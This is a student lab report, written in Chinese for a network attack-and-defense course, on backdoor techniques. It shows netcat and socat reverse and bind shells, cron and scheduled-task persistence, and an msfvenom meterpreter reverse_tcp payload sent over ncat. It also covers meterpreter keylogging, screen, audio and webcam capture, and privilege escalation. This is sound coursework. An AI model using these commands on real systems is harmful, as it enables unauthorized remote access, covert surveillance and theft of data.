20145337马月《网络对抗技术》后门原理与实践
问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
- 安卓手机后门程序,能够远程卸载应用,清洗应用程序数据
- 例举你知道的后门如何启动起来(win及linux)的方式?
- XP可将安装源光盘弹出,修改安装目录
- windows 旧版本产生大量对外链接
- 绕过系统防火墙
- 安装嗅探工具,修改用户权限
- 放大镜程序
- 构造批处理脚本
- Meterpreter有哪些给你映像深刻的功能?
- 功能强大,使用方便
- 如何发现自己有系统有没有被安装后门?
- 安装杀毒软件,定期扫描,查看任务管理器中来路不明的自启动进程
实践准备
- 本机地址
- 虚拟机地址
1.Windows 获取Linux Shell
- 在本机使用
ncat.exe -l -p 5337
命令监听特定的端口,后在KALI使用网络检测工具nc,nc IP -e
来反向连接Windows 5337端口 - 运行
ls
指令
2.Linux获得Windows Shell
- Linux运行nc 指令监听5337端口,windows反弹连接Linux
- 看到Windows的命令提示
- 利用nc传输数据
实验内容
一、使用netcat获取主机操作Shell,cron启动
-
corn启动:Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
-
Windows下使用
ncat.exe -l -p 5337
命令监听特定的端口 -
查看cron的帮助文档
- 使用
crontab -e
指令 编辑定时任务,设置为每小时第25分向Windows 5337 端口发送反弹连接
- 查看定时任务
-
稍等一下
-
在14:25时,输入指令,得到Shell
二、使用socat获取主机操作Shell.任务计划启动
socat:socat是数据间的双向传输频道,每一个数据通道可能是一个文件,管道,设备套接字
socat的地址类型很多,有ip, tcp, udp, ipv6, pipe,exec,system,open,proxy,openssl等。
- 在windows系统中打开控制面板—管理工具-任务计划程序-创建任务-填写任务名称后新建触发器,如下图所示。
- 在操作-程序或脚本中选择socat.exe文件路径,在添加参数中写tcp-listen:5337 exec:cmd.exe,pty,stderr,即将cmd.exe绑定到5337端口,同时将cmd.exe的stderr重定向到stdout上。
- 运行
- 在linux中输入socat - tcp:IP:端口号(前两次是没有关闭360安全卫士和360杀毒)
三、使用MSF meterpreter生成可执行文件,利用ncat或者socat传送到主机并运行获取主机Shell
- 在kali中输入指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=虚拟机IP LPORT=端口号 -f exe >20145337.exe
生成后门程序:
- ncat传输后门文件
windows系统使用ncat.exe -l 端口号 > 保存文件名监听准备接受文件;
- kali系统使用ncat -nv 主机IP 端口号 < 文件名来发送指定文件;
- 查看主机中的后门软件
- 设置payload,并确认
- 开始监听
- ……未果,尝试了好几次,几次都因为粗心弄混了IP,重启后IP变了好气呀
- 启动成功,获得shell
四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 截获音频
- 时间只有2s,不是很清楚怎么设置时间
- 使用摄像头拍照(没有成功)
- 使用摄像头录像(好像也没成功)
- 截屏
- 击键记录
- 提权
实验总结与体会
- 通过这次实验,对网络安全的认识更进一步,实验自己也出现了不少问题,需要多次尝试和耐心解决